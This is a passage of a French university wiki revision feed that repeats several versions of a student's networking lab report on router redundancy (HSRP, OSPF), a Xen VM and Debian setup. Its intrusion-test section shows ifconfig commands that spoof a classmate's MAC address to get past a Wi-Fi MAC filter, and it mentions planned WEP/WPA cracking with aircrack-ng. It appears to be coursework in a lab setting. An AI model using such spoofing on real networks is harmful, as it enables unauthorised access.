/etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> </pre><br /> <br /> <br /> <br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22953 TP sysres IMA2a5 2015/2016 G6 2015-11-13T15:18:59Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22948 TP sysres IMA2a5 2015/2016 G6 2015-11-13T14:54:43Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22946 TP sysres IMA2a5 2015/2016 G6 2015-11-13T14:53:20Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 